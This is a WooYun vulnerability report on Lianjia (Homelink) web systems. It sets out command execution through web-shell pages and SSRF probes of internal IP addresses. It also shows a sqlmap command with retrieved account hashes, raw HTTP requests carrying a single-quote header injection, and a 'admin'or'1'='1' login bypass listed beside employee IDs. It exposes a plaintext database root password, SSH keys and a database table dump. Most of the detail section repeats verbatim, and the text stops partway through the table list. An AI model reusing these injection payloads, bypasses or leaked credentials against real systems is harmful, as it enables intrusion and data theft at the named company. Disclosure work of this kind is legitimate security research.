当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153103

漏洞标题:链家房地产公司漏洞合集(命令执行/SSRF/SQL注入/逻辑漏洞等)

相关厂商:homelink.com.cn

漏洞作者: _Thorns

提交时间:2015-11-09 18:24

修复时间:2015-12-24 18:56

公开时间:2015-12-24 18:56

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 细节已通知厂商并且等待厂商处理中
2015-11-09: 厂商已经确认,细节仅向厂商公开
2015-11-19: 细节向核心白帽子及相关领域专家公开
2015-11-29: 细节向普通白帽子公开
2015-12-09: 细节向实习白帽子公开
2015-12-24: 细节向公众公开

简要描述:

链家房地产公司漏洞合集(二)

详细说明:

1、链家招聘系统命令执行漏洞
http://www.homelinkhr.com/view_initIndexPageForCustomer.action
http://www.homelinkhr.com/one8.jsp
http://www.homelinkhr.com/cmd.jsp

1.png


2.png


<property name="hibernate.connection.url">jdbc:mysql://127.0.0.1/homelink?useUnicode=true&amp;characterEncoding=utf8</property>
<property name="hibernate.connection.driver_class">com.mysql.jdbc.Driver</property>
<property name="hibernate.connection.username">root</property>
<property name="hibernate.connection.password">homelink</property>


backuser@172.16.3.111::hrzhaopinDB
172.16.3.55 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDenANUQXTI9NHoWt5MTz6W2mflfX9v9jaKp5Bf36gLtCxDXTw48JDiYOGyXEKqrFsm6sdMyOZJnZTV51s5wSMiCJ+mD/aGAMOelptTyrhgM8CKGcMC7joUnt+Ytgh8qaiTOVL25SodIJTcte67m2AzrobmijEjQeG4v/y54c8AY9JSYpMxl78+dm1rUBXDAXrIq+O1Xa1huH1Fzrff32O3BN447U+CnSoNcP/+zltU5Ipx1djiBr76dyaG98hlxhqByDrvOJgtwrbtKDRc9HS3eHwH/cvgbKpRHLRUZiapX+z6IOnH89MGnVSAQKl3ZgNrhzvQlSVC769cy7sm/xU7
10.20.6.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwnjauhVy/wnS7lMbk8KAnSkQxm1x+7LrdfSUFGvcn6b6jwfp0OX89lQFGZ9GjJiU7gQ/Y6gcEKyYzx5n7xburk63b/er8D8Re7Y9p9HV+MYGAC0Gv8gY0zbcyDLFRlsJLWxgIhRvtY716cyrtO5oGDv4YpKhRPNKTUntrzcY899HhVe8QY2sBIbhyq4iygzk57C73gMj+/WZ2Xxz9soxfZE2a7wIBkSZ40KRxNTfnLGi4ysixXHYm7tSxUlhWPVvlLNWZX7EPOxLePvSyeyu0fGk5Egva/qTE+Ikvqt3njiRdN6MUcyr+7ymWDtJnfb6hL06B+rwvSEZSBVixhoJ5w==
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdVKLF5zuSvw95yYgrn9ry0C1iDVrAJnmYFO9azkWQdRNwJS/XBn4HJBFDru2WMDQAxbwKPhBfrb+mTv6yPylhPqv3nAZmsdnqrwsAG1SQmDdiJi9jcX8fqfBzmrF/Rtf/T8dYDG6DyP8txn4eqKhkIHUG07cZGJJTO536SzEH4KE6hpWolW78l1s3QnkZsXWH8JDssXcYGjAnYOLyN3hevmXNsKWJk4NIRCUL6jxo+Ybwr10kzozC0k7RvkNbEwFLGIvwY0chRAqVr6BsH0iiIrVIZGlJNfM46gX2W4b6RTAXFS4WV5ZzMqo7BHRFDUXRx51+sQrSt1/X0ObmTXCR wangam_v@homelink.com.cn


被挂了一堆这种东西

4.png


3.png


http://www.homelinkhr.com/nei.jsp?http://10.20.6.4:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.5:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.6:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.11:80


就简单的看了下,其他网段没注意,修复了就好。

5.png


——————————————————————————————————————————
2、链家招聘平台SQL注入漏洞
Sqlmap -u "http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080302"

6.png


[19:14:24] [INFO] retrieved: "root","*****19DAAC4D4D97FB5C51731117291FE0A4D139"
[19:14:25] [INFO] retrieved: "zabbix","*****4D7D88CD046ECA02A80393B7780A63E7E...
[19:14:25] [INFO] retrieved: "hruser","*****19DAAC4D4D97FB5C51731117291FE0A4D139
密码我打码了。
——————————————————————————————————————
3、链家某投票网站注入漏洞+弱口令
http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
弱口令 admin

GET /admin.php?type=modify&id=5 HTTP/1.1
Host: homelinktc.sinaapp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
Cookie: saeut=171.217.194.217.1446810857432391; PHPSESSID=e9a956ed0ad36a4e78bef22de3791749
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive


1.png

2.png


——————————————————————————————————————
4、开票吧逻辑漏洞
http://kaipiaoba.homelink.com.cn/ri/system/logout.action
找回密码,网页自动返回了验证码。

3.png


4.png

5.png


——————————————————————————————————
5、培训系统注入漏洞,百密一疏。

>>  有了系统号,就直接可以进系统了。
20003441
10077125
10094796
20078458
20077533
20077532
20078346
20079701
10099533
20074589
20028476
密码:admin'or'1'='1


2.png


注入

GET /Superagent/Reports02.aspx?UniqNo=370 HTTP/1.1
Host: tc.homelink.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=neea03pfbrjwag2sgmjuakgw
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive


3.png


http://tc.homelink.com.cn/Shopmall/PurchaseItems01.aspx

1.png


权限SA,路径也有了,写个shell应该不难,参照:
WooYun: 链家某站由一个弱口令导致一次简单内网漫游(修复不彻底)
WooYun: 链家某系统SQL注入未修复彻底导致再次Getshell

Database: TrainingCenter
[310 tables]
+--------------------------------------------------+
| dbo.AcademyCertificateCourse |
| dbo.AcademyCertificateCourseProfile |
| dbo.AcademyCertificateCourseQual |
| dbo.AcademyCertificateCourseReg |
| dbo.AcademyClass |
| dbo.AcademyClassCourse |
| dbo.AcademyClassRoom |
| dbo.AcademyClassRoomUsage |
| dbo.AcademyCourse |
| dbo.AcademyCourseGroupDetail |
| dbo.AcademyCourseGroupHeader |
| dbo.AcademyCourseProfile |
| dbo.AcademyCourseQual |
| dbo.AcademyCourseVideo |
| dbo.AcademyDormitory |
| dbo.AcademyDormitoryUsage |
| dbo.AcademyEchelon |
| dbo.AcademyEchelonCourse |
| dbo.AcademyMatrix |
| dbo.AcademyMatrixZone |
| dbo.AcademyStudent |
| dbo.AcademyStudentCourseMark |
| dbo.AcademyStudentSatisfaction |
| dbo.AcademyStudentSatisfactionS |
| dbo.AcademySupervisor |
| dbo.AcademyTeacher |
| dbo.AcademyTeacherLog |
| dbo.Branch |
| dbo.City |
| dbo.Comments |
| dbo.Division |
| dbo.EmpCertificateCourseMark |
| dbo.ErrorData |
| dbo.EruditeAuditor |
| dbo.EruditeDateInfo |
| dbo.EruditeExamRoom |
| dbo.EruditeInvigilator |
| dbo.GeneralParms02 |
| dbo.Invoice |
| dbo.InvoiceMembers |
| dbo.News |
| dbo.NewsLike |
| dbo.NewsPhoto |
| dbo.Orders |
| dbo.ProductCourse |
| dbo.ProductPrice |
| dbo.Products |
| dbo.ProgramLog |
| dbo.ReaderCourse |
| dbo.SABranch |
| dbo.SecPrograms |
| dbo.SecRoleProgPrivilege |
| dbo.SecRoles |
| dbo.SecSubSystems |
| dbo.SecSystems |
| dbo.SecUserProgPrivilege |
| dbo.SecUserRole |
| dbo.SecUsers |
| dbo.SuperAgent |
| dbo.SuperAgentCandidate |
| dbo.SuperAgentScore |
| dbo.SystemParms02 |
| dbo.SystemValues |
| dbo.TC_Agent |
| dbo.TC_AgentCategory |
| dbo.TC_AgentStatus |
| dbo.TC_Area |
| dbo.TC_AreaQuizMark |
| dbo.TC_Branch |
| dbo.TC_City |
| dbo.TC_Division |
| dbo.TC_EmpQuizMark |
| dbo.TC_Employee |
| dbo.TC_EmployeeIDTemp |
| dbo.TC_EmployeeObj |
| dbo.TC_EmployeeTemp |
| dbo.TC_QuizStatus |
| dbo.TC_Teacher |
| dbo.TC_Team |
| dbo.TC_Zone |
| dbo.TMPDataCheckLog |
| dbo.UP_Agent |
| dbo.ViewAcademyCertificateCourse01 |
| dbo.ViewAcademyCertificateCourse02 |
| dbo.ViewAcademyCertificateCourseProfile01 |
| dbo.ViewAcademyCertificateCourseQual01 |
| dbo.ViewAcademyCertificateCourseReg01 |
| dbo.ViewAcademyCertificateCourseReg02 |
| dbo.ViewAcademyClass01 |
| dbo.ViewAcademyClassCourse01 |
| dbo.ViewAcademyClassCourseStudentMark01 |
| dbo.ViewAcademyClassCourseStudentMark02 |
| dbo.ViewAcademyClassRoom01 |
| dbo.ViewAcademyClassRoomNoOfStudent01 |
| dbo.ViewAcademyClassRoomNoOfStudent02 |
| dbo.ViewAcademyClassRoomUsage01 |
| dbo.ViewAcademyCourse01 |
| dbo.ViewAcademyCourseGroupDetail01 |
| dbo.ViewAcademyCourseProfile01 |
| dbo.ViewAcademyCourseQual01 |
| dbo.ViewAcademyCourseVideo01 |
| dbo.ViewAcademyDormitory01 |
| dbo.ViewAcademyDormitoryNoOfStudent01 |
| dbo.ViewAcademyDormitoryUsage01 |
| dbo.ViewAcademyEchelon01 |
| dbo.ViewAcademyEchelonClass01 |
| dbo.ViewAcademyEchelonCourse01 |
| dbo.ViewAcademyEchelonCourseByCategory01 |
| dbo.ViewAcademyEchelonNoOfStudent01 |
| dbo.ViewAcademyEchelonTerms01 |
| dbo.ViewAcademyMatrixZone01 |
| dbo.ViewAcademyStudent01 |
| dbo.ViewAcademyStudentByAreas00 |
| dbo.ViewAcademyStudentByAreas01 |
| dbo.ViewAcademyStudentByAreas02 |
| dbo.ViewAcademyStudentByAreas03 |
| dbo.ViewAcademyStudentByAreas04 |
| dbo.ViewAcademyStudentByAreas05 |
| dbo.ViewAcademyStudentByAreas06 |
| dbo.ViewAcademyStudentByBranchs00 |
| dbo.ViewAcademyStudentByBranchs01 |
| dbo.ViewAcademyStudentByBranchs02 |
| dbo.ViewAcademyStudentByBranchs03 |
| dbo.ViewAcademyStudentByBranchs04 |
| dbo.ViewAcademyStudentByBranchs05 |
| dbo.ViewAcademyStudentByBranchs06 |
| dbo.ViewAcademyStudentByTeams00 |
| dbo.ViewAcademyStudentByTeams01 |
| dbo.ViewAcademyStudentByTeams02 |
| dbo.ViewAcademyStudentByTeams03 |
| dbo.ViewAcademyStudentByTeams04 |
| dbo.ViewAcademyStudentByTeams05 |
| dbo.ViewAcademyStudentByTeams06 |
| dbo.ViewAcademyStudentByZones00 |
| dbo.ViewAcademyStudentByZones01 |
| dbo.ViewAcademyStudentByZones02 |
| dbo.ViewAcademyStudentByZones03 |
| dbo.ViewAcademyStudentByZones04 |
| dbo.ViewAcademyStudentByZones05 |
| dbo.ViewAcademyStudentByZones06 |
| dbo.ViewAcademyStudentCourseMark01 |
| dbo.ViewAcademyStudentCourseMark02 |
| dbo.ViewAcademyStudentCourseMark03 |
| dbo.ViewAcademyStudentCourseMark04 |
| dbo.ViewAcademyStudentCourseMark11 |
| dbo.ViewAcademyStudentCourseMark12 |
| dbo.ViewAcademyStudentCourseMark13 |
| dbo.ViewAcademyStudentGroupByEmpCategory01 |
| dbo.ViewAcademyStudentGroupByEmpCategoryGender01 |
| dbo.ViewAcademyStudentGroupByGender01 |
| dbo.ViewAcademyStudentGroupByZone01 |
| dbo.ViewAcademyStudentNoOfClassRoom01 |
| dbo.ViewAcademyStudentNoOfClassRoom02 |
| dbo.ViewAcademyStudentNoOfClassRoom03 |
| dbo.ViewAcademyStudentNoOfClassRoom04 |
| dbo.ViewAcademyStudentNoOfDormitory01 |
| dbo.ViewAcademyStudentNoOfEMPTMStatus01 |
| dbo.ViewAcademyStudentNoOfMatrix01 |
| dbo.ViewAcademyStudentSatisfaction01 |
| dbo.ViewAcademyStudentSatisfaction02 |
| dbo.ViewAcademyStudentSatisfactionAVG01 |
| dbo.ViewAcademyStudentSatisfactionQ00 |
| dbo.ViewAcademyStudentSatisfactionQ01 |
| dbo.ViewAcademyStudentSatisfactionQ02 |
| dbo.ViewAcademyStudentSatisfactionQ03 |
| dbo.ViewAcademyStudentSatisfactionQ04 |
| dbo.ViewAcademyStudentSatisfactionQ05 |
| dbo.ViewAcademyStudentSatisfactionQ06 |
| dbo.ViewAcademyStudentSatisfactionQ07 |
| dbo.ViewAcademyStudentSatisfactionQ08 |
| dbo.ViewAcademyStudentSatisfactionQ09 |
| dbo.ViewAcademyStudentSatisfactionQ10 |
| dbo.ViewAcademyStudentSatisfactionQ11 |
| dbo.ViewAcademyStudentSatisfactionQ12 |
| dbo.ViewAcademyStudentSatisfactionQ13 |
| dbo.ViewAcademyStudentSatisfactionQ14 |
| dbo.ViewAcademyStudentSatisfactionQ15 |
| dbo.ViewAcademyStudentSatisfactionQ16 |
| dbo.ViewAcademyStudentSatisfactionQ17 |
| dbo.ViewAcademyStudentSatisfactionQ18 |
| dbo.ViewAcademyStudentSatisfactionQ19 |
| dbo.ViewAcademyStudentSatisfactionQ20 |
| dbo.ViewAcademyTeacher01 |
| dbo.ViewAcademyTeacherPoint01 |
| dbo.ViewBranch01 |
| dbo.ViewComments01 |
| dbo.ViewComments02 |
| dbo.ViewDivision01 |
| dbo.ViewEmpCertificateCourseMark01 |
| dbo.ViewEruditeAuditor01 |
| dbo.ViewEruditeDateDistinct01 |
| dbo.ViewEruditeDateInfo01 |
| dbo.ViewEruditeExamRoom01 |
| dbo.ViewEruditeExamRoomAuditor01 |
| dbo.ViewEruditeExamRoomEmpEnroll |
| dbo.ViewEruditeInvigilator01 |
| dbo.ViewEruditeMark01 |
| dbo.ViewInvoice01 |
| dbo.ViewInvoiceMembers01 |
| dbo.ViewNews01 |
| dbo.ViewNewsLike01 |
| dbo.ViewProductCourse01 |
| dbo.ViewProducts01 |
| dbo.ViewReaderCourse01 |
| dbo.ViewSABranch01 |
| dbo.ViewSABranch02 |
| dbo.ViewSecPrograms01 |
| dbo.ViewSecRoleProgPrivilege01 |
| dbo.ViewSecRoleProgPrivilege02 |
| dbo.ViewSecSubSystems01 |
| dbo.ViewSecSystems01 |
| dbo.ViewSecUserProgPrivilege01 |
| dbo.ViewSecUserProgPrivilegeByDistSystemCode |
| dbo.ViewSecUserRole01 |
| dbo.ViewSecUsers01 |
| dbo.ViewSuperAgent01 |
| dbo.ViewSuperAgentCandidate01 |
| dbo.ViewSuperAgentScore01 |
| dbo.ViewTCAgent01 |
| dbo.ViewTCAgentByAreaAgentTotal01 |
| dbo.ViewTCAgentByBranchAgentTotal01 |
| dbo.ViewTCAgentByCityAgentTotal01 |
| dbo.ViewTCAgentByDivisionAgentTotal01 |
| dbo.ViewTCAgentByTeamAgentTotal01 |
| dbo.ViewTCAgentByZoneAgentTotal01 |
| dbo.ViewTCArea01 |
| dbo.ViewTCBranch01 |
| dbo.ViewTCCity01 |
| dbo.ViewTCDivision01 |
| dbo.ViewTCEmpQuizMark01 |
| dbo.ViewTCEmpQuizMarkByAreaAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaQuiz01 |
| dbo.ViewTCEmpQuizMarkByAreaQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByAreaUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchQuiz01 |
| dbo.ViewTCEmpQuizMarkByBranchQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByBranchUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByCityAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByCityAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByCityQuiz01 |
| dbo.ViewTCEmpQuizMarkByCityQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByCityRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByCityUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionQuiz01 |
| dbo.ViewTCEmpQuizMarkByDivisionQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByDivisionUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamQuiz01 |
| dbo.ViewTCEmpQuizMarkByTeamQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByTeamUnQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneAbsentTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneAgentTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneQuiz01 |
| dbo.ViewTCEmpQuizMarkByZoneQuizTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneRecordTotal01 |
| dbo.ViewTCEmpQuizMarkByZoneUnQuizTotal01 |
| dbo.ViewTCEmployee01 |
| dbo.ViewTCEmployeeTempNoOfRecords01 |
| dbo.ViewTCQuizDateDistinct01 |
| dbo.ViewTCTeam01 |
| dbo.ViewTCZone01 |
| dbo.ViewTeacherPrestudyLog01 |
| dbo.ViewZTCenterArea01 |
| dbo.ViewZTCenterRoom01 |
| dbo.ViewZTClass01 |
| dbo.ViewZTClass02 |
| dbo.ViewZTClassRoom01 |
| dbo.ViewZTStudent01 |
| dbo.ViewZTStudent01SumByArea |
| dbo.ViewZTStudent01SumByAreaAbsent |
| dbo.ViewZTStudent01SumByAreaAttend |
| dbo.ViewZTStudent01SumByAreaLate |
| dbo.ViewZTStudent01SumByAreaLeave |
| dbo.ViewZTStudent01SumByAreaMark100 |
| dbo.ViewZTStudent01SumByAreaPass |
| dbo.ViewZTStudent01SumByAreaTotal |
| dbo.ViewZTStudent01SumByClassAbsent |
| dbo.ViewZTStudent01SumByClassAttend |
| dbo.ViewZTStudent01SumByClassLate |
| dbo.ViewZTStudent01SumByClassLeave |
| dbo.ViewZTStudent01SumByClassMark100 |
| dbo.ViewZTStudent01SumByClassPass |
| dbo.ViewZTStudent01SumByClassTotal |
| dbo.ViewZTStudentCourse01 |
| dbo.ViewZTStudentCourseMark01 |
| dbo.ViewZTStudentCourseMark02 |
| dbo.ViewZTStudentCourseMark03 |
| dbo.ViewZone01 |
| dbo.ZTCenter |
| dbo.ZTCenterArea |
| dbo.ZTCenterRoom |
| dbo.ZTClass |
| dbo.ZTClassRoom |
| dbo.ZTStudent |
| dbo.ZTStudentCourse |
| dbo.ZTStudentCourseMark |
| dbo.ZTStudentCourseMarkTemp |
| dbo.Zone |

漏洞证明:

1、链家招聘系统命令执行漏洞
http://www.homelinkhr.com/view_initIndexPageForCustomer.action
http://www.homelinkhr.com/one8.jsp
http://www.homelinkhr.com/cmd.jsp

1.png


2.png


<property name="hibernate.connection.url">jdbc:mysql://127.0.0.1/homelink?useUnicode=true&amp;characterEncoding=utf8</property>
<property name="hibernate.connection.driver_class">com.mysql.jdbc.Driver</property>
<property name="hibernate.connection.username">root</property>
<property name="hibernate.connection.password">homelink</property>


backuser@172.16.3.111::hrzhaopinDB
172.16.3.55 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDenANUQXTI9NHoWt5MTz6W2mflfX9v9jaKp5Bf36gLtCxDXTw48JDiYOGyXEKqrFsm6sdMyOZJnZTV51s5wSMiCJ+mD/aGAMOelptTyrhgM8CKGcMC7joUnt+Ytgh8qaiTOVL25SodIJTcte67m2AzrobmijEjQeG4v/y54c8AY9JSYpMxl78+dm1rUBXDAXrIq+O1Xa1huH1Fzrff32O3BN447U+CnSoNcP/+zltU5Ipx1djiBr76dyaG98hlxhqByDrvOJgtwrbtKDRc9HS3eHwH/cvgbKpRHLRUZiapX+z6IOnH89MGnVSAQKl3ZgNrhzvQlSVC769cy7sm/xU7
10.20.6.7 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwnjauhVy/wnS7lMbk8KAnSkQxm1x+7LrdfSUFGvcn6b6jwfp0OX89lQFGZ9GjJiU7gQ/Y6gcEKyYzx5n7xburk63b/er8D8Re7Y9p9HV+MYGAC0Gv8gY0zbcyDLFRlsJLWxgIhRvtY716cyrtO5oGDv4YpKhRPNKTUntrzcY899HhVe8QY2sBIbhyq4iygzk57C73gMj+/WZ2Xxz9soxfZE2a7wIBkSZ40KRxNTfnLGi4ysixXHYm7tSxUlhWPVvlLNWZX7EPOxLePvSyeyu0fGk5Egva/qTE+Ikvqt3njiRdN6MUcyr+7ymWDtJnfb6hL06B+rwvSEZSBVixhoJ5w==
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdVKLF5zuSvw95yYgrn9ry0C1iDVrAJnmYFO9azkWQdRNwJS/XBn4HJBFDru2WMDQAxbwKPhBfrb+mTv6yPylhPqv3nAZmsdnqrwsAG1SQmDdiJi9jcX8fqfBzmrF/Rtf/T8dYDG6DyP8txn4eqKhkIHUG07cZGJJTO536SzEH4KE6hpWolW78l1s3QnkZsXWH8JDssXcYGjAnYOLyN3hevmXNsKWJk4NIRCUL6jxo+Ybwr10kzozC0k7RvkNbEwFLGIvwY0chRAqVr6BsH0iiIrVIZGlJNfM46gX2W4b6RTAXFS4WV5ZzMqo7BHRFDUXRx51+sQrSt1/X0ObmTXCR wangam_v@homelink.com.cn


被挂了一堆这种东西

4.png


3.png


http://www.homelinkhr.com/nei.jsp?http://10.20.6.4:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.5:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.6:80
http://www.homelinkhr.com/nei.jsp?http://10.20.6.11:80


就简单的看了下,其他网段没注意,修复了就好。

5.png


——————————————————————————————————————————
2、链家招聘平台SQL注入漏洞
Sqlmap -u "http://www.homelinkhr.com/view_getDetailInfoForCustomer.action?type=DD080302"

6.png


[19:14:24] [INFO] retrieved: "root","*****19DAAC4D4D97FB5C51731117291FE0A4D139"
[19:14:25] [INFO] retrieved: "zabbix","*****4D7D88CD046ECA02A80393B7780A63E7E...
[19:14:25] [INFO] retrieved: "hruser","*****19DAAC4D4D97FB5C51731117291FE0A4D139
密码我打码了。
——————————————————————————————————————
3、链家某投票网站注入漏洞+弱口令
http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
弱口令 admin

GET /admin.php?type=modify&id=5 HTTP/1.1
Host: homelinktc.sinaapp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://homelinktc.sinaapp.com/admin.php?type=modify&id=3
Cookie: saeut=171.217.194.217.1446810857432391; PHPSESSID=e9a956ed0ad36a4e78bef22de3791749
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive


1.png

2.png


——————————————————————————————————————
4、开票吧逻辑漏洞
http://kaipiaoba.homelink.com.cn/ri/system/logout.action
找回密码,网页自动返回了验证码。

3.png


4.png

5.png


——————————————————————————————————
5、培训系统注入漏洞,百密一疏。

>>  有了系统号,就直接可以进系统了。
20003441
10077125
10094796
20078458
20077533
20077532
20078346
20079701
10099533
20074589
20028476
密码:admin'or'1'='1


2.png


注入

GET /Superagent/Reports02.aspx?UniqNo=370 HTTP/1.1
Host: tc.homelink.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ASP.NET_SessionId=neea03pfbrjwag2sgmjuakgw
X-Forwarded-For: 127.0.0.1'
Connection: keep-alive


3.png


http://tc.homelink.com.cn/Shopmall/PurchaseItems01.aspx

1.png


权限SA,路径也有了,写个shell应该不难,参照:
WooYun: 链家某站由一个弱口令导致一次简单内网漫游(修复不彻底)
WooYun: 链家某系统SQL注入未修复彻底导致再次Getshell

Database: TrainingCenter
[310 tables]
+--------------------------------------------------+
| dbo.AcademyCertificateCourse |
| dbo.AcademyCertificateCourseProfile |
| dbo.AcademyCertificateCourseQual |
| dbo.AcademyCertificateCourseReg |
| dbo.AcademyClass |
| dbo.AcademyClassCourse |
| dbo.AcademyClassRoom |
| dbo.AcademyClassRoomUsage |
| dbo.AcademyCourse |
| dbo.AcademyCourseGroupDetail |
| dbo.AcademyCourseGroupHeader |
| dbo.AcademyCourseProfile |
| dbo.AcademyCourseQual |
| dbo.AcademyCourseVideo |
| dbo.AcademyDormitory |
| dbo.AcademyDormitoryUsage |
| dbo.AcademyEchelon |
| dbo.AcademyEchelonCourse |
| dbo.AcademyMatrix |
| dbo.AcademyMatrixZone |
| dbo.AcademyStudent |
| dbo.AcademyStudentCourseMark |
| dbo.AcademyStudentSatisfaction |
| dbo.AcademyStudentSatisfactionS |
| dbo.AcademySupervisor |
| dbo.AcademyTeacher |
| dbo.AcademyTeacherLog |
| dbo.Branch |
| dbo.City |
| dbo.Comments |
| dbo.Division |
| dbo.EmpCertificateCourseMark |
| dbo.ErrorData |
| dbo.EruditeAuditor |
| dbo.EruditeDateInfo |
| dbo.EruditeExamRoom |
| dbo.EruditeInvigilator |
| dbo.GeneralParms02 |
| dbo.Invoice |
| dbo.InvoiceMembers |
| dbo.News |
| dbo.NewsLike |
| dbo.NewsPhoto |
| dbo.Orders |
| dbo.ProductCourse |
| dbo.ProductPrice |
| dbo.Products |
| dbo.ProgramLog |
| dbo.ReaderCourse |
| dbo.SABranch |
| dbo.SecPrograms |
| dbo.SecRoleProgPrivilege |
| dbo.SecRoles |
| dbo.SecSubSystems |
| dbo.SecSystems |
| dbo.SecUserProgPrivilege |
| dbo.SecUserRole |
| dbo.SecUsers |
| dbo.SuperAgent |
| dbo.SuperAgentCandidate |
| dbo.SuperAgentScore |
| dbo.SystemParms02 |
| dbo.SystemValues |
| dbo.TC_Agent |
| dbo.TC_AgentCategory |
| dbo.TC_AgentStatus |
| dbo.TC_Area |
| dbo.TC_AreaQuizMark |
| dbo.TC_Branch |
| dbo.TC_City |
| dbo.TC_Division |
| dbo.TC_EmpQuizMark |
| dbo.TC_Employee |
| dbo.TC_EmployeeIDTemp |
| dbo.TC_EmployeeObj |
| dbo.TC_EmployeeTemp |
| dbo.TC_QuizStatus |
| dbo.TC_Teacher |
| dbo.TC_Team |
| dbo.TC_Zone |
| dbo.TMPDataCheckLog |
| dbo.UP_Agent |
| dbo.ViewAcademyCertificateCourse01 |
| dbo.ViewAcademyCertificateCourse02 |
| dbo.ViewAcademyCertificateCourseProfile01 |
| dbo.ViewAcademyCertificateCourseQual01 |
| dbo.ViewAcademyCertificateCourseReg01 |
| dbo.ViewAcademyCertificateCourseReg02 |
| dbo.ViewAcademyClass01 |
| dbo.ViewAcademyClassCourse01 |
| dbo.ViewAcademyClassCourseStudentMark01 |
| dbo.ViewAcademyClassCourseStudentMark02 |
| dbo.ViewAcademyClassRoom01 |
| dbo.ViewAcademyClassRoomNoOfStudent01 |
| dbo.ViewAcademyClassRoomNoOfStudent02 |
| dbo.ViewAcademyClassRoomUsage01 |
| dbo.ViewAcademyCourse01 |
| dbo.ViewAcademyCourseGroupDetail01 |
| dbo.ViewAcademyCourseProfile01 |
| dbo.ViewAcademyCourseQual01 |
| dbo.ViewAcademyCourseVideo01 |
| dbo.ViewAcademyDormitory01 |
| dbo.ViewAcademyDormitoryNoOfStudent01 |
| dbo.ViewAcademyDormitoryUsage01 |
| dbo.ViewAcademyEchelon01 |
| dbo.ViewAcademyEchelonClass01 |
| dbo.ViewAcademyEchelonCourse01 |
| dbo.ViewAcademyEchelonCourseByCategory01 |
| dbo.ViewAcademyEchelonNoOfStudent01 |
| dbo.ViewAcademyEchelonTerms01 |
| dbo.ViewAcademyMatrixZone01 |
| dbo.ViewAcademyStudent01 |
| dbo.ViewAcademyStudentByAreas00 |
| dbo.ViewAcademyStudentByAreas01 |
| dbo.ViewAcademyStudentByAreas02 |
| dbo.ViewAcademyStudentByAreas03 |
| dbo.ViewAcademyStudentByAreas04 |
| dbo.ViewAcademyStudentByAreas05 |
| dbo.ViewAcademyStudentByAreas06 |
| dbo.ViewAcademyStudentByBranchs00 |
| dbo.ViewAcademyStudentByBranchs01 |
| dbo.ViewAcademyStudentByBranchs02 |
| dbo.ViewAcademyStudentByBranchs03 |
| dbo.ViewAcademyStudentByBranchs04 |
